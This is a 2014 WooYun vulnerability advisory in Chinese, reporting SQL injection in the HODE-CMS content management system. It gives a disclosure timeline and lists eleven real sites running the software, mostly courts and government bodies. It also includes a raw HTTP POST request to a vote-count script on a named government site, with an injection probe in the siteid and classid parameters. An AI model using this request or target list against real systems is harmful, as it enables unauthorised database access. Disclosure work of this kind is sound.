当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-074981

漏洞标题:某教育系统通用SQL注入

相关厂商:南京希迪麦德软件有限公司

漏洞作者: 小马

提交时间:2014-09-04 11:40

修复时间:2014-12-03 11:42

公开时间:2014-12-03 11:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-04: 细节已通知厂商并且等待厂商处理中
2014-09-09: 厂商已经确认,细节仅向厂商公开
2014-09-12: 细节向第三方安全合作伙伴开放
2014-11-03: 细节向核心白帽子及相关领域专家公开
2014-11-13: 细节向普通白帽子公开
2014-11-23: 细节向实习白帽子公开
2014-12-03: 细节向公众公开

简要描述:

HODE-CMS网站管理平台
南京希迪麦德软件有限公司简介南京希迪麦德软件有限公司是以应用软件开发为主的股份制私营企业,致力于软件应用平台技术的开发和推广。本公司的经营模式:通过向国内外各大集团企业、政府机关提供成套技术解决方案以及优质售后服务,扩大公司各项技术的影响力,形成具有一定国内、国际影响力的技术研发服务品牌。本公司的创业宗旨:应用政府机关和企事业单位的信息工作流,逐步取代传统的信息交流模式,造福人类美好明天。目前我公司在网站内容管理系统(CMS)技术研制和销售方面取得了成就,具体表现为产品的市场份额扩大,销售量提高并在客户中产生了较好的影响力。我们之所以能够达到这个目标是因为我们的资金主要用于公司对新产品的不断研发,增加新的科研开发题目,改善现有产品的性能,为新产品打开市场,增加销售额度。南京希迪麦德软件有限公司目前提供多种产品☆网络产品公司开发了一。
以上介绍原自官网。

详细说明:

案例:
http://www.zjrzfy.gov.cn/ 镇江市润州区人民法院
http://www.zjzy.gov.cn/ 镇江市中级人民法院
http://www.jsjrfy.gov.cn/ 句容市人民法院
http://www.njng.gov.cn/ 南京宁高高科技产业园
http://www.jsrepc.com/ 江苏省辐射环保咨询中心
http://www.sundy-whcy.com/ 圣典文化创意法律服务网
http://www.njlsjjjc.gov.cn/溧水纪检监察网
http://www.jzscxh.com/ 江苏省建筑市场管理协会
http://www.jnkjj.gov.cn/江宁科技局
http://www.jszlyy.com.cn/江苏省肿瘤医院
http://cxy.jnkjj.gov.cn/江宁区产学研合作信息网
以江宁科技为例:
POST /module/votingip/votecount.php HTTP/1.1
Content-Length: 172
Content-Type: application/x-www-form-urlencoded
Referer: http://www.jnkjj.gov.cn:80/
Host: www.jnkjj.gov.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
checkboxVal_3862=&classid=1&func=%cd%b6%c6%b1&intIsLookView=1&intVoteType=1&radio_1=1&siteid=1'%22&submitstyle=&XalertInfo=%d0%bb%d0%bb%c4%fa%b5%c4%b2%ce%d3%eb%a3%a1&Xrow=1
&classid 和 &siteid都存在注入。

漏洞证明:

1.jpg

2.jpg

修复方案:

过滤

版权声明:转载请注明来源 小马@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2014-09-09 08:42

厂商回复:

最新状态:

暂无